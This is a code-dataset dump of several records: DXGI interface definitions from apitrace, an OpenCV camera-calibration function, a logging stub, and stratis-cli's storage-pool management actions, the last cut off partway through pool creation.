StdMethod(HRESULT, 'SetHDRMetaData', [(DXGI_HDR_METADATA_TYPE, 'Type'), (UINT, 'Size'), (Blob(Void, 'Size'), 'pMetaData')]),
]
IDXGIDevice4.methods += [
StdMethod(HRESULT, 'OfferResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), (DXGI_OFFER_RESOURCE_PRIORITY, 'Priority'), (DXGI_OFFER_RESOURCE_FLAGS, 'Flags')]),
StdMethod(HRESULT, 'ReclaimResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), Out(Array(DXGI_RECLAIM_RESOURCE_RESULTS, 'NumResources'), 'pResults')]),
]
IDXGIFactory5.methods += [
StdMethod(HRESULT, 'CheckFeatureSupport', [(DXGI_FEATURE, 'Feature'), Out(DXGI_FEATURE_DATA, 'pFeatureSupportData'), (UINT, 'FeatureSupportDataSize')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIOutput5,
IDXGISwapChain4,
IDXGIDevice4,
IDXGIFactory5,
])
#
# DXGI 1.6
#
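# DXGI 1.6 adds adapter enumeration by GPU preference, extended adapter and
# output descriptions (including HDR luminance data), and hardware composition
# support queries.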
DXGI_ADAPTER_FLAG3 = Enum('DXGI_ADAPTER_FLAG3', [
'DXGI_ADAPTER_FLAG3_NONE',
'DXGI_ADAPTER_FLAG3_REMOTE',
'DXGI_ADAPTER_FLAG3_SOFTWARE',
'DXGI_ADAPTER_FLAG3_ACG_COMPATIBLE',
'DXGI_ADAPTER_FLAG3_FORCE_DWORD',
'DXGI_ADAPTER_FLAG3_SUPPORT_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_SUPPORT_NON_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_KEYED_MUTEX_CONFORMANCE',
])
DXGI_ADAPTER_DESC3 = Struct('DXGI_ADAPTER_DESC3', [
(WString, 'Description'),
(UINT, 'VendorId'),
(UINT, 'DeviceId'),
(UINT, 'SubSysId'),
(UINT, 'Revision'),
(SIZE_T, 'DedicatedVideoMemory'),
(SIZE_T, 'DedicatedSystemMemory'),
(SIZE_T, 'SharedSystemMemory'),
(LUID, 'AdapterLuid'),
(DXGI_ADAPTER_FLAG3, 'Flags'),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, 'GraphicsPreemptionGranularity'),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, 'ComputePreemptionGranularity'),
])
DXGI_OUTPUT_DESC1 = Struct('DXGI_OUTPUT_DESC1', [
(WString, 'DeviceName'),
(RECT, 'DesktopCoordinates'),
(BOOL, 'AttachedToDesktop'),
(DXGI_MODE_ROTATION, 'Rotation'),
(HMONITOR, 'Monitor'),
(UINT, 'BitsPerColor'),
(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'),
(Array(FLOAT, 2), 'RedPrimary'),
(Array(FLOAT, 2), 'GreenPrimary'),
(Array(FLOAT, 2), 'BluePrimary'),
(Array(FLOAT, 2), 'WhitePoint'),
(FLOAT, 'MinLuminance'),
(FLOAT, 'MaxLuminance'),
(FLOAT, 'MaxFullFrameLuminance'),
])
DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS = Flags(UINT, [
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_FULLSCREEN',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_WINDOWED',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_CURSOR_STRETCHED',
])
DXGI_GPU_PREFERENCE = Enum('DXGI_GPU_PREFERENCE', [
'DXGI_GPU_PREFERENCE_UNSPECIFIED',
'DXGI_GPU_PREFERENCE_MINIMUM_POWER',
'DXGI_GPU_PREFERENCE_HIGH_PERFORMANCE',
])
IDXGIFactory6 = Interface('IDXGIFactory6', IDXGIFactory5)
IDXGIAdapter4 = Interface('IDXGIAdapter4', IDXGIAdapter3)
IDXGIOutput6 = Interface('IDXGIOutput6', IDXGIOutput5)
IDXGIAdapter4.methods += [
StdMethod(HRESULT, 'GetDesc3', [Out(Pointer(DXGI_ADAPTER_DESC3), 'pDesc')], sideeffects=False),
]
IDXGIOutput6.methods += [
StdMethod(HRESULT, 'GetDesc1', [Out(Pointer(DXGI_OUTPUT_DESC1), 'pDesc')], sideeffects=False),
StdMethod(HRESULT, 'CheckHardwareCompositionSupport', [Out(Pointer(DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS), 'pFlags')], sideeffects=False),
]
IDXGIFactory6.methods += [
StdMethod(HRESULT, 'EnumAdapterByGpuPreference', [(UINT, 'Adapter'), (DXGI_GPU_PREFERENCE, 'GpuPreference'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
dxgi.addInterfaces([
IDXGIFactory6,
IDXGIAdapter4,
IDXGIOutput6,
])
dxgi.addFunctions([
StdFunction(HRESULT, "DXGIDeclareAdapterRemovalSupport", [], sideeffects=False),
])
| en | 0.617361 | ########################################################################## # # Copyright 2014 VMware, Inc # Copyright 2011 <NAME> # All Rights Reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # ##########################################################################/ # IDXGIKeyedMutex::AcquireSync # 0 # 3 # 1 # 2 #"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_TO_ALL_HOLOGRAPHIC_DISPLAYS", # DXGI 1.6 # Avoid NumGammaControlPoints mismatch # # DXGI 1.2 # # # DXGI 1.3 # # XXX: Flags # # Undocumented interfaces # # http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html # # DXGI 1.4 # # # DXGI 1.5 # # # DXGI 1.6 # | 1.265041 | 1 |
code/camera_calib.py | nitchith/CarND-Advanced-Lane-Lines | 0 | 8519 | <filename>code/camera_calib.py<gh_stars>0
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
def camera_calibrate(images_list, nx=9, ny=6, show_corners=False):
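    """
    Compute camera calibration from chessboard images.

    images_list is a glob pattern (for example "camera_cal/calibration*.jpg");
    returns the tuple from cv2.calibrateCamera:
    (ret, camera_matrix, dist_coeffs, rvecs, tvecs).
    """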
    # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ..., (nx-1, ny-1, 0)
objp = np.zeros((ny*nx,3), np.float32)
objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(images_list)
if show_corners:
fig = plt.figure(figsize=(30, 30))
rows = 5
cols = 4
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (nx,ny),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
if show_corners:
img = cv2.drawChessboardCorners(img, (nx,ny), corners, ret)
ax = plt.subplot(rows, cols, idx + 1)
ax.set_title(fname)
plt.imshow(img)
return cv2.calibrateCamera(objpoints, imgpoints, gray.shape[1::-1], None, None) | <filename>code/camera_calib.py<gh_stars>0
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
def camera_calibrate(images_list, nx=9, ny=6, show_corners=False):
    # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ..., (nx-1, ny-1, 0)
objp = np.zeros((ny*nx,3), np.float32)
objp[:,:2] = np.mgrid[0:nx,0:ny].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(images_list)
if show_corners:
fig = plt.figure(figsize=(30, 30))
rows = 5
cols = 4
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (nx,ny),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
if show_corners:
img = cv2.drawChessboardCorners(img, (nx,ny), corners, ret)
ax = plt.subplot(rows, cols, idx + 1)
ax.set_title(fname)
plt.imshow(img)
return cv2.calibrateCamera(objpoints, imgpoints, gray.shape[1::-1], None, None) | en | 0.776663 | # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0) # Arrays to store object points and image points from all the images. # 3d points in real world space # 2d points in image plane. # Make a list of calibration images # Step through the list and search for chessboard corners # Find the chessboard corners # If found, add object points, image points # Draw and display the corners | 2.994801 | 3 |
python-jenkins/yaml_read_config/custom_log.py | MathiasStadler/docker-jenkins-scripted | 0 | 8520 | """ module logging"""
# logging
| """ module logging"""
# logging
| en | 0.272248 | module logging # logging | 1.098673 | 1 |
src/stratis_cli/_actions/_pool.py | stratis-storage/stratis-cli | 94 | 8521 | <gh_stars>10-100
# Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Pool actions.
"""
# isort: STDLIB
import os
from collections import defaultdict
# isort: THIRDPARTY
from justbytes import Range
from .._constants import PoolMaintenanceErrorCode
from .._errors import (
StratisCliAggregateError,
StratisCliEngineError,
StratisCliIncoherenceError,
StratisCliInUseOtherTierError,
StratisCliInUseSameTierError,
StratisCliNameConflictError,
StratisCliNoChangeError,
StratisCliPartialChangeError,
StratisCliPartialFailureError,
)
from .._stratisd_constants import BlockDevTiers, PoolActionAvailability, StratisdErrors
from ._connection import get_object
from ._constants import TOP_OBJECT
from ._formatting import get_property, print_table, size_triple, to_hyphenated
from ._utils import get_clevis_info
def _generate_pools_to_blockdevs(managed_objects, to_be_added, tier):
"""
Generate a map of pools to which block devices they own
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param tier: tier to search for blockdevs to be added
:type tier: _stratisd_constants.BlockDevTiers
:returns: a map of pool names to sets of strings containing blockdevs they own
:rtype: dict of str * frozenset of str
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, MOPool, devs, pools
pool_map = dict(
(path, str(MOPool(info).Name()))
for (path, info) in pools().search(managed_objects)
)
pools_to_blockdevs = defaultdict(list)
for modev in (
modev
for modev in (
MODev(info)
for (_, info) in devs(props={"Tier": tier}).search(managed_objects)
)
if str(modev.Devnode()) in to_be_added
):
pools_to_blockdevs[pool_map[modev.Pool()]].append(str(modev.Devnode()))
return dict(
(pool, frozenset(blockdevs)) for pool, blockdevs in pools_to_blockdevs.items()
)
def _check_opposite_tier(managed_objects, to_be_added, other_tier):
"""
Check whether specified blockdevs are already in the other tier.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param other_tier: the other tier, not the one requested
:type other_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliInUseOtherTierError: if blockdevs are used by other tier
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, other_tier
)
if pools_to_blockdevs != {}:
raise StratisCliInUseOtherTierError(
pools_to_blockdevs,
BlockDevTiers.DATA
if other_tier == BlockDevTiers.CACHE
else BlockDevTiers.CACHE,
)
def _check_same_tier(pool_name, managed_objects, to_be_added, this_tier):
"""
Check whether specified blockdevs are already in the tier to which they
are to be added.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param this_tier: the tier requested
:type this_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliPartialChangeError: if blockdevs are used by this tier
:raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, this_tier
)
owned_by_current_pool = frozenset(pools_to_blockdevs.get(pool_name, []))
owned_by_other_pools = dict(
(pool, devnodes)
for pool, devnodes in pools_to_blockdevs.items()
if pool_name != pool
)
if owned_by_current_pool != frozenset():
raise StratisCliPartialChangeError(
"add to cache" if this_tier == BlockDevTiers.CACHE else "add to data",
to_be_added.difference(owned_by_current_pool),
to_be_added.intersection(owned_by_current_pool),
)
if owned_by_other_pools != {}:
raise StratisCliInUseSameTierError(owned_by_other_pools, this_tier)
def _fetch_locked_pools_property(proxy):
"""
Fetch the LockedPools property from stratisd.
:param proxy: proxy to the top object in stratisd
:return: a representation of unlocked devices
:rtype: dict
:raises StratisCliEngineError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
return Manager.Properties.LockedPools.Get(proxy)
class PoolActions:
"""
Pool actions.
"""
@staticmethod
def create_pool(namespace):
"""
Create a stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliNameConflictError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
names = pools(props={"Name": pool_name}).search(managed_objects)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
if list(names) != []:
raise StratisCliNameConflictError("pool", pool_name)
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.DATA)
clevis_info = get_clevis_info(namespace)
((changed, (_, _)), return_code, message) = Manager.Methods.CreatePool(
proxy,
{
"name": pool_name,
"redundancy": (True, 0),
"devices": blockdevs,
"key_desc": (
(True, namespace.key_desc)
if namespace.key_desc is not None
else (False, "")
),
"clevis_info": (False, ("", ""))
if clevis_info is None
else (True, clevis_info),
},
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to create the specified pool %s but stratisd "
"reports that it did not actually create the pool"
)
% pool_name
)
@staticmethod
def init_cache(namespace): # pylint: disable=too-many-locals
"""
Initialize the cache of an existing stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
(pool_object_path, _) = next(
pools(props={"Name": pool_name})
.require_unique_match(True)
.search(managed_objects)
)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE)
((changed, devs_added), return_code, message) = Pool.Methods.InitCache(
get_object(pool_object_path), {"devices": blockdevs}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs as cache "
"to pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def list_pools(namespace):
"""
List all stratis pools.
"""
# pylint: disable=import-outside-toplevel
from ._data import MOPool, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pools_with_props = [
MOPool(info) for objpath, info in pools().search(managed_objects)
]
def physical_size_triple(mopool):
"""
Calculate the triple to display for total physical size.
The format is total/used/free where the display value for each
member of the tuple are chosen automatically according to justbytes'
configuration.
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:returns: a string to display in the resulting list output
:rtype: str
"""
total_physical_size = Range(mopool.TotalPhysicalSize())
total_physical_used = get_property(mopool.TotalPhysicalUsed(), Range, None)
return size_triple(total_physical_size, total_physical_used)
def properties_string(mopool):
"""
Make a string encoding some important properties of the pool
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:param props_map: a map of properties returned by GetAllProperties
:type props_map: dict of str * any
"""
def gen_string(has_property, code):
"""
Generate the display string for a boolean property
:param has_property: whether the property is true or false
:type has_property: bool or NoneType
:param str code: the code to generate the string for
:returns: the generated string
:rtype: str
"""
if has_property == True: # pylint: disable=singleton-comparison
prefix = " "
elif has_property == False: # pylint: disable=singleton-comparison
prefix = "~"
# This is only going to occur if the engine experiences an
# error while calculating a property or if our code has a bug.
else: # pragma: no cover
prefix = "?"
return prefix + code
props_list = [(mopool.HasCache(), "Ca"), (mopool.Encrypted(), "Cr")]
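            # e.g. " Ca,~Cr" means the pool has a cache tier and is not encrypted.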
return ",".join(gen_string(x, y) for x, y in props_list)
format_uuid = (
(lambda mo_uuid: mo_uuid) if namespace.unhyphenated_uuids else to_hyphenated
)
def alert_string(mopool):
"""
Alert information to display, if any
:param mopool: object to access pool properties
:returns: string w/ alert information, "" if no alert
:rtype: str
"""
action_availability = PoolActionAvailability.from_str(
mopool.AvailableActions()
)
error_codes = action_availability.pool_maintenance_error_codes()
return ", ".join(sorted(str(code) for code in error_codes))
tables = [
(
mopool.Name(),
physical_size_triple(mopool),
properties_string(mopool),
format_uuid(mopool.Uuid()),
alert_string(mopool),
)
for mopool in pools_with_props
]
print_table(
["Name", "Total Physical", "Properties", "UUID", "Alerts"],
sorted(tables, key=lambda entry: entry[0]),
["<", ">", ">", ">", "<"],
)
@staticmethod
def destroy_pool(namespace):
"""
Destroy a stratis pool.
If no pool exists, the method succeeds.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Manager.Methods.DestroyPool(
proxy, {"pool": pool_object_path}
)
# This branch can be covered, since the engine will return an error
# if the pool can not be destroyed because it has filesystems.
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to destroy the specified pool %s but "
"stratisd reports that it did not actually "
"destroy the pool requested"
)
% namespace.pool_name
)
@staticmethod
def rename_pool(namespace):
"""
Rename a pool.
:raises StratisCliEngineError:
:raises StratisCliNoChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import ObjectManager, Pool, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.current})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Pool.Methods.SetName(
get_object(pool_object_path), {"name": namespace.new}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed:
raise StratisCliNoChangeError("rename", namespace.new)
@staticmethod
def add_data_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified data devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.DATA
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddDataDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the data tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def add_cache_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified cache devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddCacheDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the cache tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def unlock_pools(namespace):
"""
Unlock all of the encrypted pools that have been detected by the daemon
but are still locked.
:raises StratisCliIncoherenceError:
:raises StratisCliNoChangeError:
:raises StratisCliAggregateError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
proxy = get_object(TOP_OBJECT)
locked_pools = _fetch_locked_pools_property(proxy)
if locked_pools == {}: # pragma: no cover
raise StratisCliNoChangeError("unlock", "pools")
# This block is not covered as the sim engine does not simulate the
# management of unlocked devices, so locked_pools is always empty.
errors = [] # pragma: no cover
for uuid in locked_pools: # pragma: no cover
(
(is_some, unlocked_devices),
return_code,
message,
) = Manager.Methods.UnlockPool(
proxy, {"pool_uuid": uuid, "unlock_method": namespace.unlock_method}
)
if return_code != StratisdErrors.OK:
errors.append(
StratisCliPartialFailureError(
"unlock", "pool with UUID %s" % uuid, error_message=message
)
)
if is_some and unlocked_devices == []:
raise StratisCliIncoherenceError(
(
"stratisd reported that some existing devices are locked but "
"no new devices were unlocked during this operation"
)
)
if errors != []: # pragma: no cover
raise StratisCliAggregateError("unlock", "pool", errors)
@staticmethod
def explain_code(namespace):
"""
Print an explanation of pool error code.
"""
error_code = PoolMaintenanceErrorCode.from_str(namespace.code)
assert error_code is not None
print(error_code.explain())
| # Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Pool actions.
"""
# isort: STDLIB
import os
from collections import defaultdict
# isort: THIRDPARTY
from justbytes import Range
from .._constants import PoolMaintenanceErrorCode
from .._errors import (
StratisCliAggregateError,
StratisCliEngineError,
StratisCliIncoherenceError,
StratisCliInUseOtherTierError,
StratisCliInUseSameTierError,
StratisCliNameConflictError,
StratisCliNoChangeError,
StratisCliPartialChangeError,
StratisCliPartialFailureError,
)
from .._stratisd_constants import BlockDevTiers, PoolActionAvailability, StratisdErrors
from ._connection import get_object
from ._constants import TOP_OBJECT
from ._formatting import get_property, print_table, size_triple, to_hyphenated
from ._utils import get_clevis_info
def _generate_pools_to_blockdevs(managed_objects, to_be_added, tier):
"""
Generate a map of pools to which block devices they own
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param tier: tier to search for blockdevs to be added
:type tier: _stratisd_constants.BlockDevTiers
:returns: a map of pool names to sets of strings containing blockdevs they own
:rtype: dict of str * frozenset of str
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, MOPool, devs, pools
pool_map = dict(
(path, str(MOPool(info).Name()))
for (path, info) in pools().search(managed_objects)
)
pools_to_blockdevs = defaultdict(list)
for modev in (
modev
for modev in (
MODev(info)
for (_, info) in devs(props={"Tier": tier}).search(managed_objects)
)
if str(modev.Devnode()) in to_be_added
):
pools_to_blockdevs[pool_map[modev.Pool()]].append(str(modev.Devnode()))
return dict(
(pool, frozenset(blockdevs)) for pool, blockdevs in pools_to_blockdevs.items()
)
def _check_opposite_tier(managed_objects, to_be_added, other_tier):
"""
Check whether specified blockdevs are already in the other tier.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param other_tier: the other tier, not the one requested
:type other_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliInUseOtherTierError: if blockdevs are used by other tier
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, other_tier
)
if pools_to_blockdevs != {}:
raise StratisCliInUseOtherTierError(
pools_to_blockdevs,
BlockDevTiers.DATA
if other_tier == BlockDevTiers.CACHE
else BlockDevTiers.CACHE,
)
def _check_same_tier(pool_name, managed_objects, to_be_added, this_tier):
"""
Check whether specified blockdevs are already in the tier to which they
are to be added.
:param managed_objects: the result of a GetManagedObjects call
:type managed_objects: dict of str * dict
:param to_be_added: the blockdevs to be added
:type to_be_added: frozenset of str
:param this_tier: the tier requested
:type this_tier: _stratisd_constants.BlockDevTiers
:raises StratisCliPartialChangeError: if blockdevs are used by this tier
:raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool
"""
pools_to_blockdevs = _generate_pools_to_blockdevs(
managed_objects, to_be_added, this_tier
)
owned_by_current_pool = frozenset(pools_to_blockdevs.get(pool_name, []))
owned_by_other_pools = dict(
(pool, devnodes)
for pool, devnodes in pools_to_blockdevs.items()
if pool_name != pool
)
if owned_by_current_pool != frozenset():
raise StratisCliPartialChangeError(
"add to cache" if this_tier == BlockDevTiers.CACHE else "add to data",
to_be_added.difference(owned_by_current_pool),
to_be_added.intersection(owned_by_current_pool),
)
if owned_by_other_pools != {}:
raise StratisCliInUseSameTierError(owned_by_other_pools, this_tier)
def _fetch_locked_pools_property(proxy):
"""
Fetch the LockedPools property from stratisd.
:param proxy: proxy to the top object in stratisd
:return: a representation of unlocked devices
:rtype: dict
:raises StratisCliEngineError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
return Manager.Properties.LockedPools.Get(proxy)
class PoolActions:
"""
Pool actions.
"""
@staticmethod
def create_pool(namespace):
"""
Create a stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliNameConflictError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
names = pools(props={"Name": pool_name}).search(managed_objects)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
if list(names) != []:
raise StratisCliNameConflictError("pool", pool_name)
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.DATA)
clevis_info = get_clevis_info(namespace)
((changed, (_, _)), return_code, message) = Manager.Methods.CreatePool(
proxy,
{
"name": pool_name,
"redundancy": (True, 0),
"devices": blockdevs,
"key_desc": (
